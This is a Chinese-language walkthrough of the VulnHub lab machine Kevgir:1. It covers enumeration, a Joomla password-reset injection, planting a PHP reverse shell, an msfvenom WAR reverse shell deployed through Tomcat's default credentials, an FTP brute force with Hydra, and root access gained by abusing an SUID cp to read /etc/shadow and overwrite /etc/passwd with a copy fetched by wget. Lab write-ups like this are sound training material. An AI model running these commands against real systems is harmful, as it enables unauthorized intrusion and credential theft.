[vulnhub]Kevgir: 1-Writeup

个人博客地址

http://www.darkerbox.com

欢迎大家学习交流

靶机网址:

https://www.vulnhub.com/entry/kevgir-1,137/

靶机知识点:

靶机IP:192.168.34.170
kali IP:192.168.34.80

信息收集

nmap -sV -p- 192.168.34.170

[vulnhub]Kevgir: 1-Writeup_第1张图片
端口有点多。
有4个http服务:80,8080,8081,9000

80:
[vulnhub]Kevgir: 1-Writeup_第2张图片
8080:tomcat
[vulnhub]Kevgir: 1-Writeup_第3张图片
8081:Joom

[vulnhub]Kevgir: 1-Writeup_第4张图片
9000:
[vulnhub]Kevgir: 1-Writeup_第5张图片
有四个漏洞。

先写第一个

8081端口

joomscan -u http://192.168.34.170:8081/

[vulnhub]Kevgir: 1-Writeup_第6张图片

扫出很多CVE。有网址,看看。我用的下图这个CVE。

在这里插入图片描述

https://www.exploit-db.com/exploits/6234

网址下面有例子,

[vulnhub]Kevgir: 1-Writeup_第7张图片

漏洞利用

方式一

访问:http://192.168.34.170:8081/index.php?option=com_user&view=reset&layout=confirm

[vulnhub]Kevgir: 1-Writeup_第8张图片

输入一个单引号,点击提交

[vulnhub]Kevgir: 1-Writeup_第9张图片
跳转到重置密码页面。我修改密码为123456
[vulnhub]Kevgir: 1-Writeup_第10张图片

重置密码后,
访问:http://192.168.34.170:8081/administrator/

[vulnhub]Kevgir: 1-Writeup_第11张图片
登录

[vulnhub]Kevgir: 1-Writeup_第12张图片

成功登录,寻找可以反弹shell的地方

添加了一个文章,但找了半天也没找见路径
[vulnhub]Kevgir: 1-Writeup_第13张图片

然后看wp才找见这个地方。

[vulnhub]Kevgir: 1-Writeup_第14张图片
点击beez。edit-html。
[vulnhub]Kevgir: 1-Writeup_第15张图片

这里提示了路径

[vulnhub]Kevgir: 1-Writeup_第16张图片

修为文件内容反弹shell。我用的kali下的/usr/share/webshells/php/php-reverse-shell.php,修改$Ip为kali ip

[vulnhub]Kevgir: 1-Writeup_第17张图片
应用保存一下
在这里插入图片描述
访问这个页面
[vulnhub]Kevgir: 1-Writeup_第18张图片

得到shell

[vulnhub]Kevgir: 1-Writeup_第19张图片

方式二

nikto扫8080端口

nikto -h http://192.168.34.170:8080

[vulnhub]Kevgir: 1-Writeup_第20张图片
有tomcat弱口令tomcat:tomcat,并找到管理页

[vulnhub]Kevgir: 1-Writeup_第21张图片
有上传war文件的地方。

[vulnhub]Kevgir: 1-Writeup_第22张图片

使用msfvenom生成war格式的payload。

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.34.80 LPORT=6666 -f war>r_jsp_shell_6666.war

上传文件
[vulnhub]Kevgir: 1-Writeup_第23张图片
访问
[vulnhub]Kevgir: 1-Writeup_第24张图片
[vulnhub]Kevgir: 1-Writeup_第25张图片

方式三

hydra爆破ftp的用户名密码,用户名用的是seclists,密码用的是密码,我将密码放到了seclists/Passwords/下面。

hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/passwords_john.txt 192.168.34.170 ftp -s 25

[vulnhub]Kevgir: 1-Writeup_第26张图片
几分钟爆出了账号和密码

ssh远程连接即可。

权限提升

这里是针对方式一反弹的shell。其他没有尝试

先反弹个tty。

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

找sudi权限的文件

find / -perm -u=s 2>/dev/null

发现有cp命令。

[vulnhub]Kevgir: 1-Writeup_第27张图片
使用cp命令将/etc/shadow文件复制到/tmp下面就可以查看shadow文件了
在shadow中发现了两个用户

[vulnhub]Kevgir: 1-Writeup_第28张图片
将admin用户复制到kali里。

admin:$6$mf3G6MUz$/si.Yp0SgJH/D4WQRC2lyRAaFKUqeHzC3ZbL7ENrCR2lCNibr0d8V0y03JFEnymP8MZzBi3m6mvaeeUmyySve/:16834:0:99999:7

使用john爆破:

在这里插入图片描述
[vulnhub]Kevgir: 1-Writeup_第29张图片

爆出密码是admin。
但是我们并没有获取root权限。

我在kali创建了一个用户admin,并修改/etc/passwd文件,将uid和gid修改为.

[vulnhub]Kevgir: 1-Writeup_第30张图片
kali使用python搭建简易服务器,默认是8000端口

cd /etc
python3 -m http.server

靶机下载

cd /tmp
wget http://192.168.34.80:8000/passwd

[vulnhub]Kevgir: 1-Writeup_第31张图片

cp passwd /etc/passwd
su admin

得到root权限
[vulnhub]Kevgir: 1-Writeup_第32张图片

欢迎大家一起学习交流,共同进步,欢迎加入信息安全小白群

在这里插入图片描述

你可能感兴趣的:(vulnhub)